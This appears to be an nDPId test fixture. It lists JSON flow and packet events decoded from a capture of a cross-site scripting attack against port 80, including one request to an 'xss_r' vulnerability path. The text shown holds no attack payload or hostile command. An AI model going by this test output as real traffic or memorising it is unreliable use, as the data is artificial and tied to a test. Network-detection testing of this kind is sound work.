+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":2,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7D5E+wDpMPZWy6AScSAR1wAAAgQFtAQCCAoD5bAWATveoQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":3,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGxAAD4GPWysEAABwKgKMuw+AFAw9lbLRPsA6oAQAOWw3gAAAQEICgE73qED5bAW"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347747187,"flow_last_seen":1499347747187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347747187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1499347747187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eZ5AAD4GTDKsEAABwKgKMuxYAFDkpJi3AAAAAKACchASmgAAAgQFtAQCCAoBO+EpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":2,"flow_last_seen":1499347747187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7FgZ9EBx5KSYuKAScSACkAAAAgQFtAQCCAoD5bKeATvhKQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":3,"flow_last_seen":1499347747188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347747188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eZ9AAD4GTDmsEAABwKgKMuxYAFDkpJi4GfRAcoAQAOWhlwAAAQEICgE74SkD5bKe"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347748472,"flow_last_seen":1499347748472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347748472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1499347748472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W1pAAD4GanasEAABwKgKMuxmAFDolLkwAAAAAKACchDs4QAAAgQFtAQCCAoBO+JqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":2,"flow_last_seen":1499347748472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Gb4tplB6JS5MaAScSCkAwAAAgQFtAQCCAoD5bPfATviagEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":3,"flow_last_seen":1499347748473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347748473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W1tAAD4Gan2sEAABwKgKMuxmAFDolLkx+LaZQoAQAOVDCgAAAQEICgE74msD5bPf"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347749751,"flow_last_seen":1499347749751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347749751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1499347749751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IJFAAD4GpT+sEAABwKgKMux0AFD35MM7AAAAAKACchDSOAAAAgQFtAQCCAoBO+OqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6528,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":2,"flow_last_seen":1499347749752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7HSHR7QM9+TDPKAScSDevgAAAgQFtAQCCAoD5bUfATvjqgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":3,"flow_last_seen":1499347749752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347749752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IJJAAD4GpUasEAABwKgKMux0AFD35MM8h0e0DYAQAOV9xgAAAQEICgE746oD5bUf"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347752308,"flow_last_seen":1499347752308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347752308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1499347752308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qStAAD4GHKWsEAABwKgKMuyOAFBMoE8CAAAAAKACchDvHQAAAgQFtAQCCAoBO+YpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":2,"flow_last_seen":1499347752308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7I5f6lZGTKBPA6AScSB+SAAAAgQFtAQCCAoD5beeATvmKQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":3,"flow_last_seen":1499347752309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347752309,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qSxAAD4GHKysEAABwKgKMuyOAFBMoE8DX+pWR4AQAOUdTwAAAQEICgE75ioD5bee"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347753649,"flow_last_seen":1499347753649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347753649,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1499347753649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA825ZAAD4G6jmsEAABwKgKMuycAFCJVjzvAAAAAKACchDDHAAAAgQFtAQCCAoBO+d5AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":2,"flow_last_seen":1499347753649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Jyb\/4pAiVY88KAScSDg6AAAAgQFtAQCCAoD5bjtATvneQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6559,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":3,"flow_last_seen":1499347753650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347753650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA025dAAD4G6kCsEAABwKgKMuycAFCJVjzwm\/+KQYAQAOV\/8AAAAQEICgE753kD5bjt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347756244,"flow_last_seen":1499347756244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347756244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1499347756244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sh5AAD4GE7KsEAABwKgKMuy2AFCIyFgfAAAAAKACchCl2AAAAgQFtAQCCAoBO+oBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":2,"flow_last_seen":1499347756244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Lb17AxJiMhYIKAScSDlJQAAAgQFtAQCCAoD5bt2ATvqAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":3,"flow_last_seen":1499347756245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347756245,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sh9AAD4GE7msEAABwKgKMuy2AFCIyFgg9ewMSoAQAOWELAAAAQEICgE76gID5bt2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347757502,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347757502,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UWhAAD4GdGisEAABwKgKMuzEAFA\/lLpUAAAAAKACchCLjgAAAgQFtAQCCAoBO+s8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":2,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7MQtkPNXP5S6VaAScSCq7wAAAgQFtAQCCAoD5bywATvrPAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6589,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":3,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UWlAAD4GdG+sEAABwKgKMuzEAFA\/lLpVLZDzWIAQAOVJ9wAAAQEICgE76zwD5byw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347758774,"flow_last_seen":1499347758774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347758774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 